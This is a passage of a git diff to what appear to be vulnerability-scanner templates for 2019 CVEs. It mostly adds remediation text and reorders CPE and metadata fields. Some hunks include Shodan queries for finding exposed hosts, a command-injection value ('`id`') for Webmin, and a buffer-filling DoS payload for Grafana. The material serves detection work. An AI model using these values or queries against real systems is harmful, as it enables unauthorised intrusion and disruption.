cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: kunalnagar product: custom_404_pro + framework: wordpress tags: wpscan,cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss http: diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 37f4063207..d5dfdc8a1b 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of SugarCRM Enterprise. reference: - https://www.exploit-db.com/exploits/47247 - https://nvd.nist.gov/vuln/detail/CVE-2019-14974 @@ -14,8 +16,8 @@ info: cve-id: CVE-2019-14974 cwe-id: CWE-79 epss-score: 0.00217 - cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:* epss-percentile: 0.59028 + cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 1 vendor: sugarcrm diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 0744c79dfa..fcbf92d097 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -6,6 +6,7 @@ info: severity: high description: | Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service. + remediation: Upgrade to 6.3.4 or higher. reference: - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ @@ -13,21 +14,20 @@ info: - https://aaron-hoffmann.com/posts/cve-2019-15043/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043 - https://nvd.nist.gov/vuln/detail/CVE-2019-15043 - remediation: Upgrade to 6.3.4 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2019-15043 cwe-id: CWE-306 epss-score: 0.27328 - cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* epss-percentile: 0.96168 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Grafana" verified: true + max-request: 1 vendor: grafana product: grafana + shodan-query: title:"Grafana" tags: cve,cve2019,grafana,dos,intrusive variables: payload: '{{repeat("A", 4000)}}' diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 83e0120ad3..20e7935d3d 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -5,6 +5,8 @@ info: author: bp0lr severity: critical description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi. + remediation: | + Upgrade to Webmin version 1.930 or later to mitigate this vulnerability. reference: - https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2019-15107 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-15107 cwe-id: CWE-78 epss-score: 0.97528 - cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* epss-percentile: 0.99981 + cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: webmin diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index 46802682b8..b67b7f83e9 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter. + remediation: | + Upgrade to a version of L-Soft LISTSERV that is higher than 16.5-2018a to mitigate the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/47302 - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf @@ -16,14 +18,14 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 epss-score: 0.00303 - cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* epss-percentile: 0.65819 + cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"LISTSERV" verified: true + max-request: 1 vendor: lsoft product: listserv + shodan-query: http.html:"LISTSERV" tags: cve,cve2019,xss,listserv,edb http: diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 6b0e93bcd5..8eda25daa2 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -6,6 +6,8 @@ info: severity: high description: | rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users." + remediation: | + Upgrade Webmin to version 1.920 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-15642 - https://github.com/jas502n/CVE-2019-15642 @@ -18,14 +20,14 @@ info: cve-id: CVE-2019-15642 cwe-id: CWE-94 epss-score: 0.26994 - cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* epss-percentile: 0.96156 + cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: - max-request: 4 - shodan-query: title:"Webmin" verified: true + max-request: 4 vendor: webmin product: webmin + shodan-query: title:"Webmin" tags: cve,cve2019,webmin,rce variables: cmd: '`id`' diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 8f53324c59..ec9fca3d06 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,dhiyaneshDk severity: medium description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. + remediation: | + Update to the latest version of the My Calendar plugin (>= 3.1.10) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/9267 - https://wordpress.org/plugins/my-calendar/#developers @@ -15,13 +17,13 @@ info: cve-id: CVE-2019-15713 cwe-id: CWE-79 epss-score: 0.00101 - cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40822 + cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: my_calendar_project product: my_calendar + framework: wordpress tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan http: diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index 41509b3dec..b4f5edeb7c 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters. + remediation: | + Upgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47325 - https://github.com/domainmod/domainmod/issues/108 @@ -17,11 +19,11 @@ info: cve-id: CVE-2019-15811 cwe-id: CWE-79 epss-score: 0.00376 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.6932 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: domainmod product: domainmod tags: cve,cve2019,domainmod,xss,authenticated,edb diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index d24e339184..c17e9e6065 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution. + remediation: | + Update to the latest version of the Woody Ad Snippets plugin (2.2.5) or apply the vendor-provided patch to mitigate the vulnerability. reference: - https://github.com/GeneralEG/CVE-2019-15858 - https://blog.nintechnet.com/multiple-vulnerabilities-in-wordpress-woody-ad-snippets-plugin-lead-to-remote-code-execution/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-15858 cwe-id: CWE-306 epss-score: 0.02782 - cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* epss-percentile: 0.8928 + cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: webcraftic product: woody_ad_snippets + framework: wordpress tags: cve,cve2019,wordpress,wp-plugin,xss,wp http: diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 5f5466dfce..67616c2383 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI. + remediation: | + Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability. reference: - https://seclists.org/fulldisclosure/2019/Oct/10 - https://nvd.nist.gov/vuln/detail/CVE-2019-15859 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-15859 cwe-id: CWE-200 epss-score: 0.12379 - cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.94685 + cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: socomec diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 3d435e85b9..ebe65a1d44 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter. + remediation: | + Update WordPress Download Manager plugin to version 2.9.94 or later to mitigate this vulnerability. reference: - https://www.cybersecurity-help.cz/vdb/SB2019041819 - https://wordpress.org/plugins/download-manager/#developers @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-15889 cwe-id: CWE-79 epss-score: 0.0427 - cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* epss-percentile: 0.91187 + cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wpdownloadmanager product: wordpress_download_manager + framework: wordpress tags: packetstorm,cve,cve2019,wordpress,xss,wp-plugin http: diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 1a8d9db84f..9fa79509d7 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-16057 - https://web.archive.org/web/20201222035258im_/https://blog.cystack.net/content/images/2019/09/poc.png @@ -16,14 +18,14 @@ info: cve-id: CVE-2019-16057 cwe-id: CWE-78 epss-score: 0.97548 - cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99991 + cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"ShareCenter" + max-request: 1 vendor: dlink product: dns-320_firmware + shodan-query: html:"ShareCenter" tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink http: diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 918c889739..1793fdda86 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -5,21 +5,21 @@ info: author: pikpikcu severity: medium description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration. + remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP. reference: - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - https://github.com/goharbor/harbor/issues/8951 - https://nvd.nist.gov/vuln/detail/CVE-2019-16097 - https://github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517 - http://www.vmware.com/security/advisories/VMSA-2019-0015.html - remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2019-16097 cwe-id: CWE-862 epss-score: 0.96909 - cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:* epss-percentile: 0.99592 + cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:* metadata: max-request: 1 vendor: linuxfoundation diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 03f426669a..87c51b1c7a 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion. + remediation: | + Upgrade to a patched version of PilusCart (>=1.4.2) or apply the vendor-supplied patch to mitigate the LFI vulnerability. reference: - https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html - https://www.exploit-db.com/exploits/47315 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-16123 cwe-id: CWE-22 epss-score: 0.72953 - cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* epss-percentile: 0.97666 + cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kartatopia diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index db3200eb5d..a6e6f96ae8 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify. + remediation: | + Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch. reference: - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html - https://www.exploit-db.com/raw/47837 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-16278 cwe-id: CWE-22 epss-score: 0.97349 - cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* epss-percentile: 0.99835 + cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nazgul diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index 07a4dc519f..072e83a228 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code. + remediation: | + Update the ifw8 Router ROM to a version that is not affected by CVE-2019-16313. reference: - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-16313 cwe-id: CWE-798 epss-score: 0.02626 - cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:* epss-percentile: 0.88983 + cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ifw8 diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index f23c1f73d7..787c95223f 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php. + remediation: | + Update to the latest version of WordPress API Bearer Auth plugin (20190907 or later) to mitigate the vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2152730 - https://wordpress.org/plugins/api-bearer-auth/#developers @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-16332 cwe-id: CWE-79 epss-score: 0.00303 - cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* epss-percentile: 0.65787 + cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: api_bearer_auth_project product: api_bearer_auth + framework: wordpress tags: packetstorm,cve,cve2019,wordpress,xss,wp-plugin,auth http: diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index f775af5a28..46f76f2c51 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file. + remediation: | + Update to the latest version of the WordPress Checklist plugin (1.1.9 or higher) to mitigate this vulnerability. reference: - https://wordpress.org/plugins/checklist/#developers - https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-16525 cwe-id: CWE-79 epss-score: 0.00323 - cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* epss-percentile: 0.66929 + cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: checklist product: checklist + framework: wordpress tags: xss,wp-plugin,packetstorm,cve,cve2019,wordpress http: diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index 033cfb87dd..47893c9fbc 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -6,22 +6,22 @@ info: severity: high description: | Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. + remediation: | + Cisco has released firmware updates that address this vulnerability. reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info - https://www.exploit-db.com/exploits/46262/ - https://www.exploit-db.com/exploits/46655/ - https://nvd.nist.gov/vuln/detail/CVE-2019-1653 - http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html - remediation: | - Cisco has released firmware updates that address this vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-1653 cwe-id: CWE-200,CWE-284 epss-score: 0.97578 - cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:* epss-percentile: 1 + cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 14e844f025..9f076dfad9 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution. + remediation: | + Upgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ - https://nvd.nist.gov/vuln/detail/CVE-2019-16662 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-16662 cwe-id: CWE-78 epss-score: 0.97573 - cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:* epss-percentile: 0.99999 + cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index f04ae0d7e4..5f3451e227 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade vBulletin to a version that is not affected by CVE-2019-16759. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/ - https://seclists.org/fulldisclosure/2019/Sep/31 @@ -16,14 +18,14 @@ info: cve-id: CVE-2019-16759 cwe-id: CWE-94 epss-score: 0.97535 - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* epss-percentile: 0.99987 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.component:"vBulletin" verified: true + max-request: 1 vendor: vbulletin product: vbulletin + shodan-query: http.component:"vBulletin" tags: cve,cve2019,rce,kev,seclists,vbulletin http: diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index 3d09e06043..371fa24352 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-16920 - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-16920 cwe-id: CWE-78 epss-score: 0.96275 - cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99325 + cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: dlink diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index 6feffb993f..b38290bacf 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard. + remediation: | + Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf @@ -18,14 +20,14 @@ info: cve-id: CVE-2019-16931 cwe-id: CWE-79 epss-score: 0.00244 - cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.61655 + cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: themeisle product: visualizer + framework: wordpress tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan http: diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 8469e34c22..452579e443 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. + remediation: | + Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability. reference: - https://wpscan.com/vulnerability/9892 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf @@ -18,13 +20,13 @@ info: cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.53434 - cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97161 + cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: themeisle product: visualizer + framework: wordpress tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive http: diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index cbc2a831a2..cd74bd299a 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter. + remediation: | + Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2019-16996 @@ -14,8 +16,8 @@ info: cve-id: CVE-2019-16996 cwe-id: CWE-89 epss-score: 0.30632 - cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* epss-percentile: 0.96378 + cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 vendor: metinfo diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 433c153d3b..191bd7d6f5 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter. + remediation: | + Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/2 - https://nvd.nist.gov/vuln/detail/CVE-2019-16997 @@ -14,8 +16,8 @@ info: cve-id: CVE-2019-16997 cwe-id: CWE-89 epss-score: 0.30632 - cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* epss-percentile: 0.96378 + cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 vendor: metinfo diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 0c7190dadc..150568170a 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Yachtcontrol Webapplication 1.0 makes it possible to perform 